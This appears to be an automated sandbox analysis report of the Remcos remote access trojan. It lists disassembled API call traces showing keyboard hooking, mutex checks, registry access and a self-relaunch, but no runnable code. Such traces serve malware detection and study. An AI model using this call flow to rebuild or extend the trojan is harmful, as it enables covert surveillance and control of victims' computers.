6133->6132 6136 404659 SetWindowsHookExA 6135->6136 6137 40466e GetMessageA 6135->6137 6138 40466a 6136->6138 6139 4045e3 6137->6139 6140 40467f TranslateMessage DispatchMessageA 6137->6140 6138->6137 6138->6139 6140->6138 6145 406d25 6141->6145 6148 406d7f Sleep 6145->6148 6149 406d9f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6145->6149 6155 406b78 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 6145->6155 6174 406920 12 API calls 6145->6174 6191 4065db 13 API calls 6145->6191 
6212 406511 6 API calls 6145->6212 6224 406447 6 API calls 6145->6224 6148->6145 6150 404857 4 API calls 6149->6150 6151 406dbe 6150->6151 6152 406de3 6151->6152 6153 406dc6 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 6151->6153 6154 40ab86 3 API calls 6153->6154 6154->6152 6156 40a87f 4 API calls 6155->6156 6157 406bae ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 6156->6157 6158 406bd9 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6157->6158 6159 406bff ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ExpandEnvironmentStringsA PathFileExistsA 6157->6159 6161 404857 4 API calls 6158->6161 6160 406c54 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6159->6160 6171 406c2c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6159->6171 6163 4112fa 7 API calls 6160->6163 6167 406bf8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6161->6167 6165 406c75 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6163->6165 6164 404857 4 API calls 6164->6167 6168 41178f 18 API calls 6165->6168 6167->6145 6169 406c85 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6168->6169 6170 406caf ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 6169->6170 6169->6171 6170->6167 6172 406cc3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 6170->6172 6171->6164 6173 404857 4 API calls 6172->6173 6173->6167 6175 4069e7 FindNextFileA 6174->6175 6176 4069ca FindClose 6174->6176 6186 4069f9 6175->6186 6177 406b10 

                                                Control-flow Graph
                                                (function at 0040845A; the rendered graph and its raw node/edge list are not reproduced here)
                                                APIs
                                                  • Part of subcall function 00408F23: malloc.MSVCRT ref: 00408F46
                                                  • Part of subcall function 00408F23: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00408F72
                                                  • Part of subcall function 00408F23: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408F7E
                                                  • Part of subcall function 00408F23: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408F87
                                                  • Part of subcall function 00408F23: malloc.MSVCRT ref: 00408F98
                                                  • Part of subcall function 00408F23: free.MSVCRT ref: 00408FE3
                                                  • Part of subcall function 00408F23: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408FF1
                                                  • Part of subcall function 00408F23: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408FFA
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 0040847E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040848D
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 004084F8
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408509
                                                • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408517
                                                • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408525
                                                • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408531
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040853A
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408553
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60()A,Software\,00000000,0000000E,00413764), ref: 0040857B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00413764), ref: 00408588
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00413764), ref: 00408598
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00413764), ref: 004085A1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00413764), ref: 004085AA
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00413764), ref: 004085BC
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00413764), ref: 004085D8
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041457C,)A,?,?,?,?,0000000E,00413764), ref: 004085FE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041457C,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040861D
                                                • OpenMutexA.KERNEL32(00100000,00000000,Remcos_Mutex_Inj), ref: 00408647
                                                • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00413764), ref: 0040865A
                                                • CloseHandle.KERNEL32()A,?,?,?,?,0000000E,00413764), ref: 00408663
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00413764), ref: 00408674
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408693
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004086B6
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004086C1
                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004086CB
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004086D1
                                                • GetModuleFileNameW.KERNEL32(00000000,00419994,00000104,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004086FB
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040872D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408736
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408755
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040877B
                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00413E04,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004087A0
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004087BE
                                                  • Part of subcall function 0040A7DC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00406E36,80000001,00000000), ref: 0040A7F2
                                                  • Part of subcall function 0040A7DC: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,00419970,?,00406E36,80000001,00000000), ref: 0040A807
                                                  • Part of subcall function 0040A7DC: RegCloseKey.ADVAPI32(00000000,?,00406E36,80000001,00000000), ref: 0040A812
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004087E6
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408810
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408819
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040882A
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408845
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408860
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040887B
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408896
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004088B1
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004088D6
                                                • wcslen.MSVCRT ref: 004088DD
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004088E9
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040890A
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040891C
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408937
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408940
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408949
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408974
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 0040898B
                                                  • Part of subcall function 0040300F: LoadLibraryA.KERNEL32(ntdll,RtlGetNtVersionNumbers,00419970,00419BC8,00000000,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403022
                                                  • Part of subcall function 0040300F: GetProcAddress.KERNEL32(00000000), ref: 00403029
                                                  • Part of subcall function 0040300F: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403076
                                                  • Part of subcall function 0040300F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 0040307F
                                                  • Part of subcall function 0040300F: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403089
                                                  • Part of subcall function 0040300F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403094
                                                  • Part of subcall function 0040300F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000), ref: 004030A5
                                                  • Part of subcall function 0040300F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00419994,?), ref: 004030CA
                                                  • Part of subcall function 0040300F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(004137F0,004137F0,00000000), ref: 004030FA
                                                  • Part of subcall function 0040300F: ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00403107
                                                  • Part of subcall function 0040300F: exit.MSVCRT ref: 00403113
                                                  • Part of subcall function 0040300F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040311C
                                                  • Part of subcall function 0040300F: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403125
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004089AE
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004089CC
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004089DE
                                                  • Part of subcall function 004072E6: wcslen.MSVCRT ref: 004072F5
                                                  • Part of subcall function 004072E6: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040730C
                                                  • Part of subcall function 004072E6: CreateDirectoryW.KERNEL32(00000000), ref: 00407313
                                                  • Part of subcall function 004072E6: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00419BA0,00413888,?), ref: 00407326
                                                  • Part of subcall function 004072E6: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407333
                                                  • Part of subcall function 004072E6: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407343
                                                  • Part of subcall function 004072E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 0040734C
                                                  • Part of subcall function 004072E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 0040737A
                                                  • Part of subcall function 004072E6: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407382
                                                  • Part of subcall function 004072E6: wcscmp.MSVCRT ref: 0040738F
                                                  • Part of subcall function 004072E6: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 004073A0
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004089F2
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004089FB
                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A12
                                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A1D
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A28
                                                • wcscpy.MSVCRT ref: 00408A32
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A41
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A4D
                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A56
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00408A6E
                                                  • Part of subcall function 0040AC55: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040AC91
                                                  • Part of subcall function 0040AC55: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040ACAD
                                                  • Part of subcall function 004127A4: free.MSVCRT ref: 004127A8
                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00413984), ref: 00408A99
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 00408B49
                                                • atoi.MSVCRT(00000000), ref: 00408B50
                                                • CreateThread.KERNEL32(00000000,00000000,00412442,00000000,00000000,00000000), ref: 00408B7F
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 00408B8C
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408BA0
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,004137F0), ref: 00408BC1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408BCF
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00408BF1
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00408C03
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408C1C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408C25
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 00408C4A
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00408C5C
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408C77
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408C80
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408C89
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00419894,00413888,00000000,00000011), ref: 00408CB3
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60()A,00000000,?,00000000,00000011), ref: 00408CC0
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 00408CCC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00408CD5
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00408CDE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00408CE7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00408CF8
                                                • atoi.MSVCRT(00000000,?,?,?,?,00000000,00000011), ref: 00408CFF
                                                  • Part of subcall function 004112FA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411309
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411313
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041131C
